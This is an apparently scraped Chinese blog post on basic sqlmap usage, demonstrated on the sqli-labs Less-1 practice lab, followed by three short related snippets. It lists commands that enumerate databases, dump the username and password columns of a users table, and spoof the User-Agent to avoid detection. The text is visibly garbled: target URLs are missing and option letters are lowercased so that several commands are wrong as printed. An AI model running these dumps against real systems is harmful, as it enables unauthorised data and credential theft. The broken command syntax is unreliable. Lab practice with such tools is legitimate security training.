sqlmap基礎用法

2022-08-02 13:18:14 字數 1071 閱讀 6174

用法以kali linux下sqli-lab第一關為例192.168.198.136/sqli-labs/less-1/?id=1

-u 引數

後面跟url 執行

sqlmap -u

-r 引數

後面跟txt ,txt內容為該url的請求報文資訊

sqlmap -r /root/1.txt

獲取所有資料庫

sqlmap -u --dbs

獲取security資料庫中所有表名

sqlmap -u -d security --tables

獲取security資料庫中user表中所有字段

sqlmap -u -d security -t users --columns

獲取security資料庫中user表中字段的內容

sqlmap -u -d security -t users -c username,password --dump

獲取資料庫使用者

sqlmap -u --users

--password

--current-db

--current-user

(避免用sqlmap 的user-agent 被發現報錯)

sqlmap -u "127.0.0.1/sqli-labs/less-1/?id=1" --user-agent="mozilla/5.0 (x11; linux x86_64; rv:68.0) gecko/20100101 firefox/68.0" --banner

用--user-agent 設定user-agent

也可以用--random-agent 隨機生成user-agent

需要在host後面加號或者-level 5

需要在referer後面加號或者-level 3

sqlmap.py -u "" -h "user-agent:123"(指定user-agent乙個引數)

sqlmap.py -u "" --headers = "user-agent:123\ncookie:123456" --banner

(--headers 同時設定多個引數)

sqlmap的基本用法

以sqli labs master less 1 為例 對於需要登入的 或者post提交資料的,可以通過抓取http資料報來進行以sqli labs master less 11 為例 通過bp抓包。把抓取到的內容儲存為name.txt。然後通過指定這個資料報進行探測 爆出所有的資料庫名 pytho...

sqlmap的簡單用法

sqlmap 是乙個開源滲透測試工具,它可以自動檢測和利用 sql 注入漏洞並接管資料庫伺服器。它具有強大的檢測引擎,同時有眾多功能,包括資料庫指紋識別 從資料庫中獲取資料 訪問底層檔案系統以及在作業系統上帶內連線執行命令。安裝完python,sqlmap以後就可以進行使用 簡單使用 知道庫名之後 ...

Sqlmap注入基礎命令

1.檢測當前url是否是存在sql注入漏洞 sqlmap.py u url 2.檢測當前使用的資料庫 sqlmap.py u url current db 3.檢視所有的資料庫 sqlmap.py u url dbs 4.查詢 資料庫下的所有表 sqlmap.py u url d 庫名 tables...